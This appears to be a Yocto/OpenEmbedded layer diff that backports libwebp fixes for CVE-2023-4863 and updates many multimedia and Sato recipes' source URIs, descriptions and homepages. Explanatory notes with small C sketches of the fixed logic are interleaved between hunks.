++ // Fill the new segment.
++ // We need at least 'total_size' but if that value is small, it is better to
++ // allocate a big chunk to prevent more allocations later. 'segment_size' is
++ // therefore chosen (any other arbitrary value could be chosen).
++ next->size = total_size > segment_size ? total_size : segment_size;
++ next->start =
++ (HuffmanCode*)WebPSafeMalloc(next->size, sizeof(*next->start));
++ if (next->start == NULL) {
++ WebPSafeFree(next);
++ return 0;
++ }
++ next->curr_table = next->start;
++ next->next = NULL;
++ // Point to the new segment.
++ root_table->curr_segment->next = next;
++ root_table->curr_segment = next;
++ }
++ if (code_lengths_size <= SORTED_SIZE_CUTOFF) {
+ // use local stack-allocated array.
+ uint16_t sorted[SORTED_SIZE_CUTOFF];
+- total_size = BuildHuffmanTable(root_table, root_bits,
+- code_lengths, code_lengths_size, sorted);
+- } else { // rare case. Use heap allocation.
++ BuildHuffmanTable(root_table->curr_segment->curr_table, root_bits,
++ code_lengths, code_lengths_size, sorted);
++ } else { // rare case. Use heap allocation.
+ uint16_t* const sorted =
+ (uint16_t*)WebPSafeMalloc(code_lengths_size, sizeof(*sorted));
+ if (sorted == NULL) return 0;
+- total_size = BuildHuffmanTable(root_table, root_bits,
+- code_lengths, code_lengths_size, sorted);
++ BuildHuffmanTable(root_table->curr_segment->curr_table, root_bits,
++ code_lengths, code_lengths_size, sorted);
+ WebPSafeFree(sorted);
+ }
+ return total_size;
+ }
++
++int VP8LHuffmanTablesAllocate(int size, HuffmanTables* huffman_tables) {
++ // Have 'segment' point to the first segment for now, 'root'.
++ HuffmanTablesSegment* const root = &huffman_tables->root;
++ huffman_tables->curr_segment = root;
++ // Allocate root.
++ root->start = (HuffmanCode*)WebPSafeMalloc(size, sizeof(*root->start));
++ if (root->start == NULL) return 0;
++ root->curr_table = root->start;
++ root->next = NULL;
++ root->size = size;
++ return 1;
++}
++
++void VP8LHuffmanTablesDeallocate(HuffmanTables* const huffman_tables) {
++ HuffmanTablesSegment *current, *next;
++ if (huffman_tables == NULL) return;
++ // Free the root node.
++ current = &huffman_tables->root;
++ next = current->next;
++ WebPSafeFree(current->start);
++ current->start = NULL;
++ current->next = NULL;
++ current = next;
++ // Free the following nodes.
++ while (current != NULL) {
++ next = current->next;
++ WebPSafeFree(current->start);
++ WebPSafeFree(current);
++ current = next;
++ }
++}
+diff --git a/src/utils/huffman_utils.h b/src/utils/huffman_utils.h
+index 13b7ad1..98415c5 100644
+--- a/src/utils/huffman_utils.h
++++ b/src/utils/huffman_utils.h
+@@ -43,6 +43,29 @@ typedef struct {
+ // or non-literal symbol otherwise
+ } HuffmanCode32;
+
++// Contiguous memory segment of HuffmanCodes.
++typedef struct HuffmanTablesSegment {
++ HuffmanCode* start;
++ // Pointer to where we are writing into the segment. Starts at 'start' and
++ // cannot go beyond 'start' + 'size'.
++ HuffmanCode* curr_table;
++ // Pointer to the next segment in the chain.
++ struct HuffmanTablesSegment* next;
++ int size;
++} HuffmanTablesSegment;
++
++// Chained memory segments of HuffmanCodes.
++typedef struct HuffmanTables {
++ HuffmanTablesSegment root;
++ // Currently processed segment. At first, this is 'root'.
++ HuffmanTablesSegment* curr_segment;
++} HuffmanTables;
++
++// Allocates a HuffmanTables with 'size' contiguous HuffmanCodes. Returns 0 on
++// memory allocation error, 1 otherwise.
++int VP8LHuffmanTablesAllocate(int size, HuffmanTables* huffman_tables);
++void VP8LHuffmanTablesDeallocate(HuffmanTables* const huffman_tables);
++
+ #define HUFFMAN_PACKED_BITS 6
+ #define HUFFMAN_PACKED_TABLE_SIZE (1u << HUFFMAN_PACKED_BITS)
+
+@@ -78,9 +101,7 @@ void VP8LHtreeGroupsFree(HTreeGroup* const htree_groups);
+ // the huffman table.
+ // Returns built table size or 0 in case of error (invalid tree or
+ // memory error).
+-// If root_table is NULL, it returns 0 if a lookup cannot be built, something
+-// > 0 otherwise (but not the table size).
+-int VP8LBuildHuffmanTable(HuffmanCode* const root_table, int root_bits,
++int VP8LBuildHuffmanTable(HuffmanTables* const root_table, int root_bits,
+ const int code_lengths[], int code_lengths_size);
+
+ #ifdef __cplusplus
+--
+2.40.0
+
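The patch above replaces the single pre-sized HuffmanCode buffer with a chain of memory segments that can grow while the codes are being read, so a crafted code-length sequence can no longer overrun a fixed-size allocation (the heap overflow behind CVE-2023-4863). The standalone sketch below restates that allocate/reserve/free pattern in isolation, so the control flow is easier to follow than in the hunks; the names (CodeSegment, CodeTables, code_tables_*) are illustrative stand-ins rather than the libwebp API, and the entry type is simplified to int.

#include <stdlib.h>
#include <string.h>

typedef struct CodeSegment {
    int* start;                 /* contiguous block of table entries        */
    int* curr;                  /* next free slot inside this block         */
    struct CodeSegment* next;   /* following segment in the chain, if any   */
    int size;                   /* capacity of this block, in entries       */
} CodeSegment;

typedef struct {
    CodeSegment root;           /* first segment, embedded in the owner     */
    CodeSegment* curr_segment;  /* segment currently being filled           */
} CodeTables;

static int code_tables_init(CodeTables* const t, int size) {
    t->root.start = (int*)calloc((size_t)size, sizeof(*t->root.start));
    if (t->root.start == NULL) return 0;
    t->root.curr = t->root.start;
    t->root.next = NULL;
    t->root.size = size;
    t->curr_segment = &t->root;
    return 1;
}

/* Returns 'count' contiguous entries, or NULL on allocation failure. When the
   current segment cannot hold them, a new segment is chained in and the unused
   tail of the old one is abandoned, because callers need contiguous memory.   */
static int* code_tables_reserve(CodeTables* const t, int count) {
    CodeSegment* seg = t->curr_segment;
    int* out;
    if (seg->curr + count > seg->start + seg->size) {
        const int new_size = (count > seg->size) ? count : seg->size;
        CodeSegment* const next = (CodeSegment*)calloc(1, sizeof(*next));
        if (next == NULL) return NULL;
        next->start = (int*)calloc((size_t)new_size, sizeof(*next->start));
        if (next->start == NULL) { free(next); return NULL; }
        next->curr = next->start;
        next->size = new_size;
        seg->next = next;
        t->curr_segment = seg = next;
    }
    out = seg->curr;
    seg->curr += count;
    return out;
}

static void code_tables_release(CodeTables* const t) {
    CodeSegment* cur = t->root.next;
    free(t->root.start);       /* root is embedded, only its buffer is freed */
    while (cur != NULL) {
        CodeSegment* const next = cur->next;
        free(cur->start);
        free(cur);
        cur = next;
    }
    memset(t, 0, sizeof(*t));
}

Keeping the first segment embedded in the owning struct means the common case costs a single heap allocation, and an oversized request falls through to a fresh segment sized to the larger of the request and the previous segment size, which is the same growth rule VP8LBuildHuffmanTable applies above when it runs out of room.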
diff --git a/meta/recipes-multimedia/webp/files/CVE-2023-4863-0002.patch b/meta/recipes-multimedia/webp/files/CVE-2023-4863-0002.patch
new file mode 100644
index 0000000000..c1eedb6100
--- /dev/null
+++ b/meta/recipes-multimedia/webp/files/CVE-2023-4863-0002.patch
@@ -0,0 +1,53 @@
+From 95ea5226c870449522240ccff26f0b006037c520 Mon Sep 17 00:00:00 2001
+From: Vincent Rabaud <vrabaud@google.com>
+Date: Mon, 11 Sep 2023 16:06:08 +0200
+Subject: [PATCH 2/2] Fix invalid incremental decoding check.
+
+The first condition is only necessary if we have not read enough
+(enough being defined by src_last, not src_end which is the end
+of the image).
+The second condition now fits the comment below: "if not
+incremental, and we are past the end of buffer".
+
+BUG=oss-fuzz:62136
+
+Change-Id: I0700f67c62db8e1c02c2e429a069a71e606a5e4f
+
+CVE: CVE-2023-4863
+
+Upstream-Status: Backport [https://github.com/webmproject/libwebp/commit/95ea5226c870449522240ccff26f0b006037c520]
+
+Signed-off-by: Soumya Sambu <soumya.sambu@windriver.com>
+---
+ src/dec/vp8l_dec.c | 15 +++++++++++++--
+ 1 file changed, 13 insertions(+), 2 deletions(-)
+
+diff --git a/src/dec/vp8l_dec.c b/src/dec/vp8l_dec.c
+index 0d38314..684a5b6 100644
+--- a/src/dec/vp8l_dec.c
++++ b/src/dec/vp8l_dec.c
+@@ -1237,9 +1237,20 @@ static int DecodeImageData(VP8LDecoder* const dec, uint32_t* const data,
+ }
+
+ br->eos_ = VP8LIsEndOfStream(br);
+- if (dec->incremental_ && br->eos_ && src < src_end) {
++ // In incremental decoding:
++ // br->eos_ && src < src_last: if 'br' reached the end of the buffer and
++ // 'src_last' has not been reached yet, there is not enough data. 'dec' has to
++ // be reset until there is more data.
++ // !br->eos_ && src < src_last: this cannot happen as either the buffer is
++ // fully read, either enough has been read to reach 'src_last'.
++ // src >= src_last: 'src_last' is reached, all is fine. 'src' can actually go
++ // beyond 'src_last' in case the image is cropped and an LZ77 goes further.
++ // The buffer might have been enough or there is some left. 'br->eos_' does
++ // not matter.
++ assert(!dec->incremental_ || (br->eos_ && src < src_last) || src >= src_last);
++ if (dec->incremental_ && br->eos_ && src < src_last) {
+ RestoreState(dec);
+- } else if (!br->eos_) {
++ } else if ((dec->incremental_ && src >= src_last) || !br->eos_) {
+ // Process the remaining rows corresponding to last row-block.
+ if (process_func != NULL) {
+ process_func(dec, row > last_row ? last_row : row);
+--
+2.40.0
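The corrected condition above can be read as a small decision function over the decoder state. The sketch below restates it with stand-in types and names (DecState and can_process_rows are invented for the example, not libwebp symbols): 'src_last' marks how far this call was asked to decode, and the true end of the image no longer takes part in the test.

#include <assert.h>

typedef struct {
    int incremental;   /* decoding as the bytes arrive; may be resumed later */
    int eos;           /* the bit reader has consumed all available input    */
} DecState;

/* Returns 1 when the rows decoded so far may be processed, 0 when the decoder
   state must be rewound to wait for more input.                              */
static int can_process_rows(const DecState* const s,
                            const unsigned char* const src,
                            const unsigned char* const src_last) {
    /* In incremental mode only two outcomes are reachable: the input ran out
       before 'src_last', or 'src_last' (or beyond, via LZ77) was reached.     */
    assert(!s->incremental || (s->eos && src < src_last) || src >= src_last);
    if (s->incremental && s->eos && src < src_last) return 0;  /* need more data */
    return (s->incremental && src >= src_last) || !s->eos;     /* safe to flush  */
}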
diff --git a/meta/recipes-multimedia/webp/libwebp_1.1.0.bb b/meta/recipes-multimedia/webp/libwebp_1.1.0.bb
index 68e5ae2b3c..88c36cb76c 100644
--- a/meta/recipes-multimedia/webp/libwebp_1.1.0.bb
+++ b/meta/recipes-multimedia/webp/libwebp_1.1.0.bb
@@ -19,6 +19,12 @@ SRC_URI[sha256sum] = "98a052268cc4d5ece27f76572a7f50293f439c17a98e67c4ea0c7ed6f5
UPSTREAM_CHECK_URI = "http://downloads.webmproject.org/releases/webp/index.html"
+SRC_URI += " \
+ file://CVE-2023-1999.patch \
+ file://CVE-2023-4863-0001.patch \
+ file://CVE-2023-4863-0002.patch \
+"
+
EXTRA_OECONF = " \
--disable-wic \
--enable-libwebpmux \
diff --git a/meta/recipes-multimedia/x264/x264_git.bb b/meta/recipes-multimedia/x264/x264_git.bb
index 39429a8809..6789646833 100644
--- a/meta/recipes-multimedia/x264/x264_git.bb
+++ b/meta/recipes-multimedia/x264/x264_git.bb
@@ -8,7 +8,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=94d55d512a9ba36caa9b7df079bae19f"
DEPENDS = "nasm-native"
-SRC_URI = "git://github.com/mirror/x264;branch=stable \
+SRC_URI = "git://github.com/mirror/x264;branch=stable;protocol=https \
file://don-t-default-to-cortex-a9-with-neon.patch \
file://Fix-X32-build-by-disabling-asm.patch \
"
diff --git a/meta/recipes-rt/rt-tests/rt-tests.inc b/meta/recipes-rt/rt-tests/rt-tests.inc
index 3ac39d90c3..29ebe2d361 100644
--- a/meta/recipes-rt/rt-tests/rt-tests.inc
+++ b/meta/recipes-rt/rt-tests/rt-tests.inc
@@ -2,7 +2,7 @@
SRCREV = "dff174f994f547a5785d32454865f140daacb0f5"
PE = "1"
-SRC_URI = "git://git.kernel.org/pub/scm/utils/rt-tests/rt-tests.git"
+SRC_URI = "git://git.kernel.org/pub/scm/utils/rt-tests/rt-tests.git;branch=main"
# 1.2 to 1.5 seem to be development versions
UPSTREAM_CHECK_GITTAGREGEX = "v(?P<pver>(?!1\.[2-6])(\d+(\.\d+)+))"
diff --git a/meta/recipes-rt/rt-tests/rt-tests_1.1.bb b/meta/recipes-rt/rt-tests/rt-tests_1.1.bb
index dad252b4ed..1db86b5067 100644
--- a/meta/recipes-rt/rt-tests/rt-tests_1.1.bb
+++ b/meta/recipes-rt/rt-tests/rt-tests_1.1.bb
@@ -1,5 +1,6 @@
SUMMARY = "Real-Time preemption testcases"
-HOMEPAGE = "https://rt.wiki.kernel.org/index.php/Cyclictest"
+HOMEPAGE = "https://wiki.linuxfoundation.org/realtime/documentation/start"
+DESCRIPTION = "The main aim of the PREEMPT_RT patch is to minimize the amount of kernel code that is non-preemptible. Therefore, several substitution mechanisms and new mechanisms are implemented."
SECTION = "tests"
DEPENDS = "linux-libc-headers virtual/libc"
LICENSE = "GPLv2 & GPLv2+"
diff --git a/meta/recipes-sato/images/core-image-sato-dev.bb b/meta/recipes-sato/images/core-image-sato-dev.bb
index 7fa69d0997..f45a83273c 100644
--- a/meta/recipes-sato/images/core-image-sato-dev.bb
+++ b/meta/recipes-sato/images/core-image-sato-dev.bb
@@ -3,5 +3,6 @@ require core-image-sato.bb
DESCRIPTION = "Image with Sato for development work. It includes everything \
within core-image-sato plus a native toolchain, application development and \
testing libraries, profiling and debug symbols."
+HOMEPAGE = "https://www.yoctoproject.org/"
IMAGE_FEATURES += "dev-pkgs"
diff --git a/meta/recipes-sato/images/core-image-sato-ptest-fast.bb b/meta/recipes-sato/images/core-image-sato-ptest-fast.bb
index 3641217306..d37ad00cf8 100644
--- a/meta/recipes-sato/images/core-image-sato-ptest-fast.bb
+++ b/meta/recipes-sato/images/core-image-sato-ptest-fast.bb
@@ -1,9 +1,13 @@
+inherit features_check
+REQUIRED_DISTRO_FEATURES = "ptest"
+
require core-image-sato-sdk.bb
require conf/distro/include/ptest-packagelists.inc
IMAGE_INSTALL += "${PTESTS_FAST}"
DESCRIPTION += "Also includes ptest packages with fast execution times to allow for more automated QA."
+HOMEPAGE = "https://www.yoctoproject.org/"
# This image is sufficiently large (~1.8GB) that it can't actually fit in a live
# image (which has a 4GB limit), so nullify the overhead factor (1.3x out of the
diff --git a/meta/recipes-sato/images/core-image-sato-sdk-ptest.bb b/meta/recipes-sato/images/core-image-sato-sdk-ptest.bb
index bf749acd79..eea89a5d6c 100644
--- a/meta/recipes-sato/images/core-image-sato-sdk-ptest.bb
+++ b/meta/recipes-sato/images/core-image-sato-sdk-ptest.bb
@@ -1,7 +1,11 @@
+inherit features_check
+REQUIRED_DISTRO_FEATURES = "ptest"
+
require core-image-sato-sdk.bb
require conf/distro/include/ptest-packagelists.inc
DESCRIPTION += "Also includes ptest packages."
+HOMEPAGE = "https://www.yoctoproject.org/"
PROVIDES += "core-image-sato-ptest"
diff --git a/meta/recipes-sato/images/core-image-sato-sdk.bb b/meta/recipes-sato/images/core-image-sato-sdk.bb
index d7cc52b52b..b52de0def0 100644
--- a/meta/recipes-sato/images/core-image-sato-sdk.bb
+++ b/meta/recipes-sato/images/core-image-sato-sdk.bb
@@ -3,6 +3,7 @@ require core-image-sato.bb
DESCRIPTION = "Image with Sato support that includes everything within \
core-image-sato plus meta-toolchain, development headers and libraries to \
form a standalone SDK."
+HOMEPAGE = "https://www.yoctoproject.org/"
IMAGE_FEATURES += "dev-pkgs tools-sdk \
tools-debug eclipse-debug tools-profile tools-testapps debug-tweaks ssh-server-openssh"
diff --git a/meta/recipes-sato/images/core-image-sato.bb b/meta/recipes-sato/images/core-image-sato.bb
index 673106eb6d..300d8e0d43 100644
--- a/meta/recipes-sato/images/core-image-sato.bb
+++ b/meta/recipes-sato/images/core-image-sato.bb
@@ -1,6 +1,7 @@
DESCRIPTION = "Image with Sato, a mobile environment and visual style for \
mobile devices. The image supports X11 with a Sato theme, Pimlico \
applications, and contains terminal, editor, and file manager."
+HOMEPAGE = "https://www.yoctoproject.org/"
IMAGE_FEATURES += "splash package-management x11-base x11-sato ssh-server-dropbear hwcodecs"
@@ -12,4 +13,5 @@ TOOLCHAIN_HOST_TASK_append = " nativesdk-intltool nativesdk-glib-2.0"
TOOLCHAIN_HOST_TASK_remove_task-populate-sdk-ext = " nativesdk-intltool nativesdk-glib-2.0"
QB_MEM = '${@bb.utils.contains("DISTRO_FEATURES", "opengl", "-m 512", "-m 256", d)}'
+QB_MEM_qemuarmv5 = "-m 256"
QB_MEM_qemumips = "-m 256"
diff --git a/meta/recipes-sato/l3afpad/l3afpad_git.bb b/meta/recipes-sato/l3afpad/l3afpad_git.bb
index 6fdcc3e392..4d5d299d47 100644
--- a/meta/recipes-sato/l3afpad/l3afpad_git.bb
+++ b/meta/recipes-sato/l3afpad/l3afpad_git.bb
@@ -1,4 +1,8 @@
SUMMARY = "Simple GTK+ Text Editor"
+DESCRIPTION = "L3afpad is a simple GTK+ text editor that emphasizes simplicity. As development \
+focuses on keeping weight down to a minimum, only the most essential features \
+are implemented in the editor. L3afpad is simple to use, is easily compiled, \
+requires few libraries, and starts up quickly."
HOMEPAGE = "https://github.com/stevenhoneyman/l3afpad"
# Note that COPYING seems to mistakenly contain LGPLv2.1.
@@ -12,7 +16,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c \
DEPENDS = "gtk+3 intltool-native gettext-native"
PV = "0.8.18.1.11+git${SRCPV}"
-SRC_URI = "git://github.com/stevenhoneyman/l3afpad.git"
+SRC_URI = "git://github.com/stevenhoneyman/l3afpad.git;branch=master;protocol=https"
SRCREV ="3cdccdc9505643e50f8208171d9eee5de11a42ff"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-sato/matchbox-config-gtk/matchbox-config-gtk_0.2.bb b/meta/recipes-sato/matchbox-config-gtk/matchbox-config-gtk_0.2.bb
index 547e851c15..5733a36b12 100644
--- a/meta/recipes-sato/matchbox-config-gtk/matchbox-config-gtk_0.2.bb
+++ b/meta/recipes-sato/matchbox-config-gtk/matchbox-config-gtk_0.2.bb
@@ -11,7 +11,7 @@ RDEPENDS_${PN} = "settings-daemon"
# SRCREV tagged 0.2
SRCREV = "ef2192ce98d9374ffdad5f78544c3f8f353c16aa"
-SRC_URI = "git://git.yoctoproject.org/${BPN} \
+SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master \
file://no-handed.patch"
UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>(\d+(\.\d+)+))"
diff --git a/meta/recipes-sato/matchbox-desktop/matchbox-desktop_2.2.bb b/meta/recipes-sato/matchbox-desktop/matchbox-desktop_2.2.bb
index 5c23e85202..2a2eb24f57 100644
--- a/meta/recipes-sato/matchbox-desktop/matchbox-desktop_2.2.bb
+++ b/meta/recipes-sato/matchbox-desktop/matchbox-desktop_2.2.bb
@@ -1,4 +1,5 @@
SUMMARY = "Matchbox Window Manager Desktop"
+DESCRIPTION = "A lightweight window manager for embedded systems. It uses the desktop background to provide an application launcher and allows modules to be loaded for additional functionality."
HOMEPAGE = "http://matchbox-project.org/"
BUGTRACKER = "http://bugzilla.yoctoproject.org/"
@@ -12,7 +13,7 @@ SECTION = "x11/wm"
# SRCREV tagged 2.2
SRCREV = "6bc67d09da4147e5552fe30011a05a2c59d2f777"
-SRC_URI = "git://git.yoctoproject.org/${BPN}-2 \
+SRC_URI = "git://git.yoctoproject.org/${BPN}-2;branch=master \
file://vfolders/* \
"
diff --git a/meta/recipes-sato/matchbox-keyboard/matchbox-keyboard_0.1.1.bb b/meta/recipes-sato/matchbox-keyboard/matchbox-keyboard_0.1.1.bb
index dfc7fbad57..49e37bd77c 100644
--- a/meta/recipes-sato/matchbox-keyboard/matchbox-keyboard_0.1.1.bb
+++ b/meta/recipes-sato/matchbox-keyboard/matchbox-keyboard_0.1.1.bb
@@ -1,4 +1,5 @@
SUMMARY = "Matchbox virtual keyboard for X11"
+DESCRIPTION = "An on-screen 'virtual' or 'software' keyboard."
HOMEPAGE = "http://matchbox-project.org"
BUGTRACKER = "http://bugzilla.yoctoproject.org/"
SECTION = "x11"
diff --git a/meta/recipes-sato/matchbox-panel-2/matchbox-panel-2_2.11.bb b/meta/recipes-sato/matchbox-panel-2/matchbox-panel-2_2.11.bb
index 2e6f5b7085..54fe578cd3 100644
--- a/meta/recipes-sato/matchbox-panel-2/matchbox-panel-2_2.11.bb
+++ b/meta/recipes-sato/matchbox-panel-2/matchbox-panel-2_2.11.bb
@@ -1,4 +1,6 @@
SUMMARY = "Simple GTK+ based panel for handheld devices"
+DESCRIPTION = "A flexible, always-present 'window bar' for holding application \
+launchers and small 'applet' style applications."
HOMEPAGE = "http://matchbox-project.org"
BUGTRACKER = "http://bugzilla.yoctoproject.org/"
@@ -21,7 +23,7 @@ RPROVIDES_${PN} = "matchbox-panel"
RREPLACES_${PN} = "matchbox-panel"
RCONFLICTS_${PN} = "matchbox-panel"
-SRC_URI = "git://git.yoctoproject.org/${BPN} \
+SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master \
file://0001-applets-systray-Allow-icons-to-be-smaller.patch \
"
diff --git a/meta/recipes-sato/matchbox-terminal/matchbox-terminal_0.2.bb b/meta/recipes-sato/matchbox-terminal/matchbox-terminal_0.2.bb
index 9f00281dde..e2e81c2905 100644
--- a/meta/recipes-sato/matchbox-terminal/matchbox-terminal_0.2.bb
+++ b/meta/recipes-sato/matchbox-terminal/matchbox-terminal_0.2.bb
@@ -11,7 +11,7 @@ SECTION = "x11/utils"
#SRCREV tagged 0.2
SRCREV = "161276d0f5d1be8187010fd0d9581a6feca70ea5"
-SRC_URI = "git://git.yoctoproject.org/${BPN}"
+SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master"
UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>(\d+(\.\d+)+))"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-sato/matchbox-theme-sato/matchbox-theme-sato_0.2.bb b/meta/recipes-sato/matchbox-theme-sato/matchbox-theme-sato_0.2.bb
index 7a043d3447..bc4024736f 100644
--- a/meta/recipes-sato/matchbox-theme-sato/matchbox-theme-sato_0.2.bb
+++ b/meta/recipes-sato/matchbox-theme-sato/matchbox-theme-sato_0.2.bb
@@ -2,7 +2,7 @@ require matchbox-theme-sato.inc
# SRCREV tagged 0.2
SRCREV = "df085ba9cdaeaf2956890b0e29d7ea1779bf6c78"
-SRC_URI = "git://git.yoctoproject.org/matchbox-sato"
+SRC_URI = "git://git.yoctoproject.org/matchbox-sato;branch=master"
UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>(\d+(\.\d+)+))"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-sato/packagegroups/packagegroup-core-x11-sato.bb b/meta/recipes-sato/packagegroups/packagegroup-core-x11-sato.bb
index ed3f1a69a1..25725e078d 100644
--- a/meta/recipes-sato/packagegroups/packagegroup-core-x11-sato.bb
+++ b/meta/recipes-sato/packagegroups/packagegroup-core-x11-sato.bb
@@ -3,6 +3,8 @@
#
SUMMARY = "Sato desktop"
+DESCRIPTION = "Packagegroups provide a convenient mechanism for bundling a collection of packages."
+HOMEPAGE = "https://www.yoctoproject.org/"
PR = "r33"
PACKAGE_ARCH = "${MACHINE_ARCH}"
diff --git a/meta/recipes-sato/pcmanfm/pcmanfm_1.3.1.bb b/meta/recipes-sato/pcmanfm/pcmanfm_1.3.1.bb
index 7885e0abae..153fbeb0b7 100644
--- a/meta/recipes-sato/pcmanfm/pcmanfm_1.3.1.bb
+++ b/meta/recipes-sato/pcmanfm/pcmanfm_1.3.1.bb
@@ -1,4 +1,5 @@
SUMMARY = "Fast lightweight tabbed filemanager"
+DESCRIPTION = "A free file manager application and the standard file manager of LXDE."
HOMEPAGE = "http://pcmanfm.sourceforge.net/"
LICENSE = "GPLv2 & GPLv2+ & LGPLv2.1+"
diff --git a/meta/recipes-sato/puzzles/puzzles_git.bb b/meta/recipes-sato/puzzles/puzzles_git.bb
index 41b78d6fe1..3ee441998d 100644
--- a/meta/recipes-sato/puzzles/puzzles_git.bb
+++ b/meta/recipes-sato/puzzles/puzzles_git.bb
@@ -1,4 +1,5 @@
SUMMARY = "Simon Tatham's Portable Puzzle Collection"
+DESCRIPTION = "Collection of small computer programs which implement one-player puzzle games."
HOMEPAGE = "http://www.chiark.greenend.org.uk/~sgtatham/puzzles/"
LICENSE = "MIT"
LIC_FILES_CHKSUM = "file://LICENCE;md5=6099f4981f9461d7f411091e69a7f07a"
@@ -8,7 +9,7 @@ DEPENDS = "libxt"
# The libxt requires x11 in DISTRO_FEATURES
REQUIRED_DISTRO_FEATURES = "x11"
-SRC_URI = "git://git.tartarus.org/simon/puzzles.git \
+SRC_URI = "git://git.tartarus.org/simon/puzzles.git;branch=main \
file://fix-compiling-failure-with-option-g-O.patch \
file://0001-palisade-Fix-warnings-with-clang-on-arm.patch \
file://0001-Use-Wno-error-format-overflow-if-the-compiler-suppor.patch \
diff --git a/meta/recipes-sato/rxvt-unicode/rxvt-unicode.inc b/meta/recipes-sato/rxvt-unicode/rxvt-unicode.inc
index b568f04580..0e5bcbe480 100644
--- a/meta/recipes-sato/rxvt-unicode/rxvt-unicode.inc
+++ b/meta/recipes-sato/rxvt-unicode/rxvt-unicode.inc
@@ -5,6 +5,7 @@ terminal emulator rxvt, modified to store text in Unicode \
(either UCS-2 or UCS-4) and to use locale-correct input and \
output. It also supports mixing multiple fonts at the \
same time, including Xft fonts."
+HOMEPAGE = "https://rxvt.org/"
DEPENDS = "virtual/libx11 libxt libxft gdk-pixbuf libxmu"
SRC_URI = "http://dist.schmorp.de/rxvt-unicode/Attic/rxvt-unicode-${PV}.tar.bz2 \
diff --git a/meta/recipes-sato/rxvt-unicode/rxvt-unicode/0001-libev-remove-deprecated-throw-specification.patch b/meta/recipes-sato/rxvt-unicode/rxvt-unicode/0001-libev-remove-deprecated-throw-specification.patch
new file mode 100644
index 0000000000..f10dca09d6
--- /dev/null
+++ b/meta/recipes-sato/rxvt-unicode/rxvt-unicode/0001-libev-remove-deprecated-throw-specification.patch
@@ -0,0 +1,30 @@
+From 9a8f1d73e7b7e183768a8379ef32429a84f0e5c2 Mon Sep 17 00:00:00 2001
+From: Khem Raj <raj.khem@gmail.com>
+Date: Fri, 26 Feb 2021 18:11:56 -0800
+Subject: [PATCH] libev: remove deprecated throw specification
+
+removes the throw specifications that are deprecated since C++11:
+warning: dynamic exception specifications are deprecated in C++11 [-Wdeprecated]
+
+Upstream-Status: Pending
+Signed-off-by: Khem Raj <raj.khem@gmail.com>
+---
+ libev/ev++.h | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/libev/ev++.h b/libev/ev++.h
+index 4f0a36a..85ddf44 100644
+--- a/libev/ev++.h
++++ b/libev/ev++.h
+@@ -376,7 +376,7 @@ namespace ev {
+
+ struct default_loop : loop_ref
+ {
+- default_loop (unsigned int flags = AUTO) throw (bad_loop)
++ default_loop (unsigned int flags = AUTO)
+ #if EV_MULTIPLICITY
+ : loop_ref (ev_default_loop (flags))
+ #endif
+--
+2.30.1
+
diff --git a/meta/recipes-sato/rxvt-unicode/rxvt-unicode_9.22.bb b/meta/recipes-sato/rxvt-unicode/rxvt-unicode_9.22.bb
index bfa8a614df..283e8d7751 100644
--- a/meta/recipes-sato/rxvt-unicode/rxvt-unicode_9.22.bb
+++ b/meta/recipes-sato/rxvt-unicode/rxvt-unicode_9.22.bb
@@ -4,5 +4,7 @@ LICENSE = "GPLv3"
LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504 \
file://src/main.C;beginline=1;endline=31;md5=d3600d7ee1062667fcd1193fbe6485f6"
-SRC_URI[md5sum] = "93782dec27494eb079467dacf6e48185"
+SRC_URI += "file://0001-libev-remove-deprecated-throw-specification.patch"
+
SRC_URI[sha256sum] = "e94628e9bcfa0adb1115d83649f898d6edb4baced44f5d5b769c2eeb8b95addd"
+
diff --git a/meta/recipes-sato/sato-screenshot/sato-screenshot_0.3.bb b/meta/recipes-sato/sato-screenshot/sato-screenshot_0.3.bb
index 2b1f513f1c..7e7612253d 100644
--- a/meta/recipes-sato/sato-screenshot/sato-screenshot_0.3.bb
+++ b/meta/recipes-sato/sato-screenshot/sato-screenshot_0.3.bb
@@ -11,7 +11,7 @@ DEPENDS = "matchbox-panel-2 gtk+3"
# SRCREV tagged 0.3
SRCREV = "9250fa5a012d84ff45984e8c4345ee7635227756"
-SRC_URI = "git://git.yoctoproject.org/screenshot"
+SRC_URI = "git://git.yoctoproject.org/screenshot;branch=master"
UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>(\d+(\.\d+)+))"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-sato/settings-daemon/settings-daemon_0.0.2.bb b/meta/recipes-sato/settings-daemon/settings-daemon_0.0.2.bb
index d01177f9b9..19c4a73dc3 100644
--- a/meta/recipes-sato/settings-daemon/settings-daemon_0.0.2.bb
+++ b/meta/recipes-sato/settings-daemon/settings-daemon_0.0.2.bb
@@ -9,7 +9,7 @@ SECTION = "x11"
# SRCREV tagged 0.0.2
SRCREV = "b2e5da502f8c5ff75e9e6da771372ef8e40fd9a2"
-SRC_URI = "git://git.yoctoproject.org/xsettings-daemon \
+SRC_URI = "git://git.yoctoproject.org/xsettings-daemon;branch=master \
file://addsoundkeys.patch \
file://70settings-daemon.sh \
"
diff --git a/meta/recipes-sato/webkit/webkitgtk/0001-MiniBrowser-Fix-reproduciblity.patch b/meta/recipes-sato/webkit/webkitgtk/0001-MiniBrowser-Fix-reproduciblity.patch
new file mode 100644
index 0000000000..528dec8c8b
--- /dev/null
+++ b/meta/recipes-sato/webkit/webkitgtk/0001-MiniBrowser-Fix-reproduciblity.patch
@@ -0,0 +1,31 @@
+From dcf9ae0dc0b4510eddbeeea09e11edfb123f95af Mon Sep 17 00:00:00 2001
+From: Khem Raj <raj.khem@gmail.com>
+Date: Sun, 2 May 2021 13:10:49 -0700
+Subject: [PATCH] MiniBrowser: Fix reproduciblity
+
+Do not emit references to the source dir in generated source code
+
+Upstream-Status: Submitted [https://bugs.webkit.org/show_bug.cgi?id=225283]
